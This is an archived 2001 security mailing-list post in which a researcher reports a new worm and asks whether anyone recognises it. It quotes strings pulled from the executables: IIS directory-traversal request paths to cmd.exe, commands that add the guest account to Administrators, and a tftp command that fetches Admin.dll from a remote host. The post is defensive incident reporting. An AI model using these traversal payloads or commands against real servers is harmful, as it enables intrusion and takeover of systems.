New "concept" virus/worm?

From: Joao Gouveia (jgouveiaat_private)
Date: Tue Sep 18 2001 - 08:42:51 PDT


    ( sorry for the cross-post, this might have interest for both lists )
    
    Hello all,
    
    Today I've received two apparently distinct strange incidents: one sequence of
    strange mails with executable attachments, and a large number of hits on my
    IDS regarding attempts to exploit known security problems within Microsoft
    IIS.
    At first glance, I did not understand that those two incidents were
    related, until I did a "strings *.exe" to figure out what the hell that was.
    What I could find out is that this is (at least for me) a new
    virus/worm/whatever that uses SMTP (exploiting known vulnerabilities within
    Microsoft Outlook) and many other known vulnerabilities within Microsoft
    IIS.
    Here are some of its contents:
    
    <quote>
    SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
    SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
    Concept Virus(CV) V.5, Copyright(C)2001  R.P.China
    ....
    NUL=
    [rename]
    \wininit.ini
    Personal
    Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    \*.*
    EXPLORER
    fsdhqherwqi2001
    SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
    share c$=c:\
    user guest ""
    localgroup Administrators guest /add
    localgroup Guests guest /add
    user guest /active
    open
    user guest /add
    HideFileExt
    ShowSuperHidden
    Hidden
    Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    ...
    software\microsoft\windows nt\currentversion\perflib
    /scripts
    /MSADC
    /scripts/..%255c..
    /_vti_bin/..%255c../..%255c../..%255c..
    /_mem_bin/..%255c../..%255c../..%255c..
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
    /scripts/..%c1%1c..
    /scripts/..%c0%2f..
    /scripts/..%c0%af..
    /scripts/..%c1%9c..
    /scripts/..%%35%63..
    /scripts/..%%35c..
    /scripts/..%25%35%63..
    /scripts/..%252f..
    /root.exe?/c+
    /winnt/system32/cmd.exe?/c+
    net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
    tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
    Admin.dll
    c:\Admin.dll
    d:\Admin.dll
    e:\Admin.dll
    html script language="JavaScript" window.open("readme.eml", null,
    "resizable=no,top=6000,left=6000") script html
    /Admin.dll
    GET %s HTTP/1.0
    Host: www
    Connnection: close
    readme
    main
    index
    default
    html
    .asp
    .htm
    \readme.eml
    .exe
    winzip32.exe
    riched20.dll
    .nws
    .eml
    .doc
     .exe
    ...
    SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
    Cache
    Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
    QUIT
    Subject:
    From: <
    DATA
    RCPT TO: <
    MAIL FROM: <
    HELO
    aabbcc
     -dontrunold
    NULL
    \readme*.exe
    admin.dll
    qusery9bnow
     -qusery9bnow
    \mmc.exe
    \riched20.dll
    boot
    Shell
    explorer.exe load.exe -dontrunold
    \system.ini
    \load.exe
    ....
    </quote>
    
    I kept the executables for analysis; if anyone would like to take a look,
    drop me an email.
    
    So, what I ask is: does anyone know about this worm?
    I've done a quick search for it and couldn't find anything like it.
    
    Best regards,
    
    Joao Gouveia
    -------------
    jgouveiaat_private
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    
    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:53:04 PDT